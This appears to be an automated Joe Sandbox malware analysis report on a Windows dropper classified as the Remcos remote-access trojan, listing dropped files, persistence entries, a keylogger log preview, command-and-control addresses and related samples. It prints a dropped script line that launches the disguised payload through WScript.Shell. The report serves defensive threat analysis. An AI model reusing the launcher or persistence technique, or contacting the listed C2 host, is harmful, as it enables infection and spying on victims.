dropped 53 C:\Users\user\AppData\...\Securify360.js, ASCII 25->53 dropped 55 C:\ProgramData\remcos\registros.dat, data 25->55 dropped 79 Drops PE files with a suspicious file extension 25->79 81 Installs a global keyboard hook 25->81 36 cmd.exe 2 25->36         started        39 cmd.exe 1 25->39         started        file11 signatures12 process13 file14 49 C:\Users\user\AppData\...\Securify360.url, MS 36->49 dropped 41 conhost.exe 36->41         started        43 conhost.exe 39->43         started        45 schtasks.exe 1 39->45         started        process15

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    sXpIsdpkzy.exe53%ReversingLabsWin32.Trojan.Casdet
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr3%ReversingLabs
    C:\Users\user\AppData\Local\Temp\33988\Paintball.com3%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    geoplugin.net
    178.237.33.50
    truefalse
      high
      3diciembre.con-ip.com
      181.131.217.244
      truetrue
        unknown
        OFfdlkbKbwMNYjhkX.OFfdlkbKbwMNYjhkX
        unknown
        unknowntrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://geoplugin.net/json.gpfalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0sXpIsdpkzy.exefalse
              high
              http://www.autoitscript.com/autoit3/JPaintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000000.1326888462.00000000009C9000.00000002.00000001.01000000.00000007.sdmp, Securify360.scr, 00000013.00000000.1361219033.0000000001059000.00000002.00000001.01000000.00000009.sdmp, Securify360.scr, 00000016.00000000.1456357468.0000000001059000.00000002.00000001.01000000.00000009.sdmp, Zinc.0.dr, Securify360.scr.11.dr, Paintball.com.2.drfalse
                high
                http://ocsp.sectigo.com00sXpIsdpkzy.exefalse
                  high
                  https://sectigo.com/CPS0sXpIsdpkzy.exefalse
                    high
                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#sXpIsdpkzy.exefalse
                      high
                      http://nsis.sf.net/NSIS_ErrorErrorsXpIsdpkzy.exefalse
                        high
                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0sXpIsdpkzy.exefalse
                          high
                          http://ocsp.sectigo.com0sXpIsdpkzy.exefalse
                            high
                            https://www.autoitscript.com/autoit3/Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drfalse
                              high
                              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#sXpIsdpkzy.exefalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                181.131.217.244
                                3diciembre.con-ip.comColombia
                                13489EPMTelecomunicacionesSAESPCOtrue
                                178.237.33.50
                                geoplugin.netNetherlands
                                8455ATOM86-ASATOM86NLfalse
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1573901
                                Start date and time:2024-12-12 17:38:03 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 2s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:28
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:sXpIsdpkzy.exe
                                renamed because original name is a hash value
                                Original Sample Name:28773fb2aff96e836707d9ffd5e8aa706d0ce54c956fbee42b9dd9b150e997e8.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.expl.evad.winEXE@36/25@4/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 82
                                • Number of non-executed functions: 317
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • VT rate limit hit for: sXpIsdpkzy.exe
                                TimeTypeDescription
                                11:38:55API Interceptor1x Sleep call for process: sXpIsdpkzy.exe modified
                                11:39:01API Interceptor2216x Sleep call for process: Paintball.com modified
                                17:39:02Task SchedulerRun new task: Mon path: wscript s>//B "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js"
                                17:39:03AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                181.131.217.244x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                  VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                    ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                      3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                        pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                          s0tuvMen1D.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                            hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                              SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                QU4rXM7CiL.exeGet hashmaliciousRemcosBrowse
                                                  4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                    178.237.33.50VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • geoplugin.net/json.gp
                                                    DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • geoplugin.net/json.gp
                                                    PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • geoplugin.net/json.gp
                                                    matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                    • geoplugin.net/json.gp
                                                    WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    geoplugin.netVwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                    • 178.237.33.50
                                                    WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    EPMTelecomunicacionesSAESPCOx4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                    • 181.131.217.244
                                                    VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                    • 181.131.217.244
                                                    ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                    • 181.131.217.244
                                                    3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                    • 181.131.217.244
                                                    pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                    • 181.131.217.244
                                                    s0tuvMen1D.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                    • 181.131.217.244
                                                    hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                    • 181.131.217.244
                                                    SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                    • 181.131.217.244
                                                    QU4rXM7CiL.exeGet hashmaliciousRemcosBrowse
                                                    • 181.131.217.244
                                                    ppc.elfGet hashmaliciousMiraiBrowse
                                                    • 191.98.81.24
                                                    ATOM86-ASATOM86NLVwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                    • 178.237.33.50
                                                    WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Users\user\AppData\Local\Temp\33988\Paintball.comSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                      'Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                            JSWunwO4rS.lnkGet hashmaliciousLummaC StealerBrowse
                                                              Yn13dTQdcW.exeGet hashmaliciousVidarBrowse
                                                                DM6vAAgoCw.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                  Setup.exeGet hashmaliciousVidarBrowse
                                                                    Setup.exeGet hashmaliciousVidarBrowse
                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                        C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                                          'Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                              Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                JSWunwO4rS.lnkGet hashmaliciousLummaC StealerBrowse
                                                                                  Yn13dTQdcW.exeGet hashmaliciousVidarBrowse
                                                                                    DM6vAAgoCw.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                                      Setup.exeGet hashmaliciousVidarBrowse
                                                                                        Setup.exeGet hashmaliciousVidarBrowse
                                                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            Process:C:\Users\user\AppData\Local\Temp\33988\Paintball.com
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):184
                                                                                            Entropy (8bit):3.292321519291528
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:rhlKlyKMlFPl7Jwb5JWRal2Jl+7R0DAlBG4phlKlyKMlFPl7Jv6blovDl6v:6lZUgb5YcIeeDAlMlZUCbWAv
                                                                                            MD5:BDB58EF433B263D83E352AE887445F13
                                                                                            SHA1:8DD9B1404D7ED4598E77AA683EBABC13DF5D7102
                                                                                            SHA-256:67D2B2AAEF057537A4D34ECB2142639239DDCA64DB7B80242F49ACD506A305AB
                                                                                            SHA-512:8D584312262F8D58EB9BF919657BCAB954C73326EE5FDDC97675C621FD1A0B9A0AA227591D0F7153A1C0FC9AD67AA380AB8A65FEFE0DF0C6E639B3F7B4323C25
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\registros.dat, Author: Joe Security
                                                                                            Preview:....[.2.0.2.4./.1.2./.1.2. .1.1.:.4.0.:.4.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.4.0.:.4.8. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\33988\Paintball.com
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):963
                                                                                            Entropy (8bit):5.018384957371898
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                                                            MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                                                            SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                                                            SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                                                            SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                                                            Malicious:false
                                                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                            Process:C:\Users\user\AppData\Local\Temp\33988\Paintball.com
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):180
                                                                                            Entropy (8bit):4.836656187090179
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:RiMIpGXIdPHo55wWAX+ZFk/iEkD52AGBCT4MD55CvlZo5uWAX+ZFk/iEkD52AGB9:RiJBJHonwWDEnkDdLBDHCvlywWDEnkDG
                                                                                            MD5:21D760D106377F124E11C9AD72C92A34
                                                                                            SHA1:4D3F6B4F554DA750DC52C4875D6C17D3132CB688
                                                                                            SHA-256:D5DBAB2A4E2CD79A04C8C1E1B429A75836A484AA427065949BBC7AB4331C4427
                                                                                            SHA-512:E2682DD283D7D4800F58E22643B1E043FA874F085FADFD8D76889C3A1959A7CF5A34009E32C6326AEB77AB66F40FDEA50146DD2CD06C82231A97C369A866C16B
                                                                                            Malicious:true
                                                                                            Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\Secure360 Innovations\\Securify360.scr\" \"C:\\Users\\user\\AppData\\Local\\Secure360 Innovations\\V\"")
                                                                                            Process:C:\Users\user\AppData\Local\Temp\33988\Paintball.com
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):893608
                                                                                            Entropy (8bit):6.620254876639106
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                            MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                            SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                            SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: JSWunwO4rS.lnk, Detection: malicious, Browse
                                                                                            • Filename: Yn13dTQdcW.exe, Detection: malicious, Browse
                                                                                            • Filename: DM6vAAgoCw.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Local\Temp\33988\Paintball.com
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):721784
                                                                                            Entropy (8bit):7.999710906856325
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:wibiGT++O7OMXvbXcBeClT0TlRIYK2u8NqWJCbpGTPJBJ5dM7OlXMaVWblulctsY:zTGdINT0TlBuMlCbpGTPJBndckcaVseq
                                                                                            MD5:B2FF0600FDA096C51D9708E2EDDADE53
                                                                                            SHA1:5E34CA4BBA9741256476E79E246ED5151C073C99
                                                                                            SHA-256:8F8A0006C93FBC5FBD31147A1B967175C964ABB5F9DB8F639FCFC7840B241A24
                                                                                            SHA-512:10B548431748F7DF91B37D16CCA716F63F9EEE93DB1082D895ADB4916593EF3F2051147AE07890C26976579C7BDB489C6026E39AA2E316439E85B3E469621636
                                                                                            Malicious:false
                                                                                            Preview:...@.y.2..w;sgn.A.*6!#1k.5oE..PMz.D.n3'....c..O.u...W..qk6...>..&...*....j/Hp..R .~.......77....3.<...r.*...c-/.*..Q..@{W.!.Oz....iX..,s..&.....4.......L<.U...wa.5.6.^..........`.l.'....f.k.l..q;...BI..+.Q...h)<..AqW..~L.r.........C"}L.1......0}./.}..;../..._......N..$...}.wo.Q....=..jNaMF..Y\.......k...Q.`I..Y.l...T,+..w.&r .q.X.^.xNeM.....H....8*.m/...9........F.h....p..p...8..I/N..+...\>....^U..#.....2HJZ.....Xh@.(=t.p.1...Q%..h..[./{T.Hd........$}h..Ac.4.6j..V.F.Z,jz...1.......A..~O0.'hD._.M.8....[[%2]-P.`x0......:p.*:4z<.M.q..).E.L...y....>.\]....1!. 3....-C..`..6.G"m}..{@.Hi.#.....D.U/UG..I.x..s.w^Z.:...3<...f....Yf^.q.9k.p..9WXH...Y.!......0.~J=..g.&p.(..M<...[...2CDSA.tW..ue.s.FW.dn..>c...5y..h...%s.....fC...Oyl..hU......X.ax.Z.x..<.U..}. ......5.....Hn...h..n.P../.R.s2<.5.yr..C.^Z.s...y...`..AAx0n.0.[.9.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:modified
                                                                                            Size (bytes):893608
                                                                                            Entropy (8bit):6.620254876639106
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                            MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                            SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                            SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: JSWunwO4rS.lnk, Detection: malicious, Browse
                                                                                            • Filename: Yn13dTQdcW.exe, Detection: malicious, Browse
                                                                                            • Filename: DM6vAAgoCw.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):721784
                                                                                            Entropy (8bit):7.999710906856325
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:wibiGT++O7OMXvbXcBeClT0TlRIYK2u8NqWJCbpGTPJBJ5dM7OlXMaVWblulctsY:zTGdINT0TlBuMlCbpGTPJBndckcaVseq
                                                                                            MD5:B2FF0600FDA096C51D9708E2EDDADE53
                                                                                            SHA1:5E34CA4BBA9741256476E79E246ED5151C073C99
                                                                                            SHA-256:8F8A0006C93FBC5FBD31147A1B967175C964ABB5F9DB8F639FCFC7840B241A24
                                                                                            SHA-512:10B548431748F7DF91B37D16CCA716F63F9EEE93DB1082D895ADB4916593EF3F2051147AE07890C26976579C7BDB489C6026E39AA2E316439E85B3E469621636
                                                                                            Malicious:false
                                                                                            Preview:...@.y.2..w;sgn.A.*6!#1k.5oE..PMz.D.n3'....c..O.u...W..qk6...>..&...*....j/Hp..R .~.......77....3.<...r.*...c-/.*..Q..@{W.!.Oz....iX..,s..&.....4.......L<.U...wa.5.6.^..........`.l.'....f.k.l..q;...BI..+.Q...h)<..AqW..~L.r.........C"}L.1......0}./.}..;../..._......N..$...}.wo.Q....=..jNaMF..Y\.......k...Q.`I..Y.l...T,+..w.&r .q.X.^.xNeM.....H....8*.m/...9........F.h....p..p...8..I/N..+...\>....^U..#.....2HJZ.....Xh@.(=t.p.1...Q%..h..[./{T.Hd........$}h..Ac.4.6j..V.F.Z,jz...1.......A..~O0.'hD._.M.8....[[%2]-P.`x0......:p.*:4z<.M.q..).E.L...y....>.\]....1!. 3....-C..`..6.G"m}..{@.Hi.#.....D.U/UG..I.x..s.w^Z.:...3<...f....Yf^.q.9k.p..9WXH...Y.!......0.~J=..g.&p.(..M<...[...2CDSA.tW..ue.s.FW.dn..>c...5y..h...%s.....fC...Oyl..hU......X.ax.Z.x..<.U..}. ......5.....Hn...h..n.P../.R.s2<.5.yr..C.^Z.s...y...`..AAx0n.0.[.9.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..
                                                                                            Process:C:\Users\user\Desktop\sXpIsdpkzy.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):84992
                                                                                            Entropy (8bit):7.997762968697265
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:m3dDdczf4L629u0Z5eD27FJJfStMypTtliYLncU2hdGyTEEC4AjZgoBM/LtfE3u5:mag229u0//BJst/pfiGn2hd+E/E7yTtF
                                                                                            MD5:C3E50EF81367A341CF75DF50DEF52B2D
                                                                                            SHA1:E0B0D31D00CFA6DD3E42C004CCE8F0B5E556DCC4
                                                                                            SHA-256:64E68DF4C8F3F684E45D09422ADB521609539C518BB73D7749C88004573F3FA2
                                                                                            SHA-512:94D920985B0DDE1A9F8647D5C732A7ADD05E5A6F501B02D9D511FC07CFA62394C7E25716AA880720AEF7C9C2568F696AAAA555A16EF5D5EC354FC44F2BA8CE1F
                                                                                            Malicious:false
                                                                                            Preview:.Sz..s.7.%...G.q....Y..6...X.X.....#tvUv.......e4.d{$.2..D.--.F.C.....:...t%x...Lh.y....cK.~P.J.I......%.8s.......,..-..#..p.[.;P...6,.V[..1..s.e.........r...8.q.*.0,MUF*..'l.G.n..Y.R...u......?..m...Y........p..B.@.A.s.....)%...g..@.M......2i...........8.....L^56..q.c.;....mH..`...yI.....2XN...8.;........b^P./.Q...g.v,....a.v..`k....x.B.1...j......y.M.#$.*.._...9tOk.B(....._..KU.*v_..$t.|..m._.6..r......:B.Y.."..0.]y...d.>....i/.......z..ei..mX7/.."/._.*....y......,{.G.;..e.i.h.c...... .....[q.B,...[.df[...Ii..[......g&....u.9.......N.....y..Ct...H g.-@...|.G_c.W....B.8.)o...'.U.\h....{..]...x.v....,.L/.z.."F.."..n0.o....xbqI.$d.#.{..*.H.&. ..9.......n..@.{.....vf...U....|...>..}i.C...y+.........zaF...k.p.Na.x...../...?..?\.^.....;...<...Y..@-....L.lI...........@...*#u..l... ..G.}7.XQ..A.YZ...+..B..-h0..Pd!<..J.#.nP.fY...C....)7.]6&.B...h..{......:a...3.....:7..Y.qBS.<#.|...V~.....Y.C...l.f..j.MfnK..)...t..NX.I)K........qwp.|......J..
                                                                                            Process:C:\Users\user\Desktop\sXpIsdpkzy.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):87040
                                                                                            Entropy (8bit):7.997589719549875
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:H1wrDdElrak3YGdEPv9MX8ykjEBR8sObIXCvfjUM4A/vCrRJR28+bgpC9:HOdEMkzdsmPkjEBCbIXu4A/vG2FbKc
                                                                                            MD5:5AFD0C99996C2F5B79957D7E571805BE
                                                                                            SHA1:8F46C56D8185362FD14A708BC536FEBF52AAB37F
                                                                                            SHA-256:E228A8330C23B23181FAD534CE378D0E595B318797F4BFFB617F5A09D8084454
                                                                                            SHA-512:C62F77E42F1DD64ACE9B6837AE149B0EB775ABAB91476EFF54D86D883BABC439EA096CC8DCF2508929D46BE6A362D6091FF6CFFD8B2E79F00BD359CC375648E9
                                                                                            Malicious:false
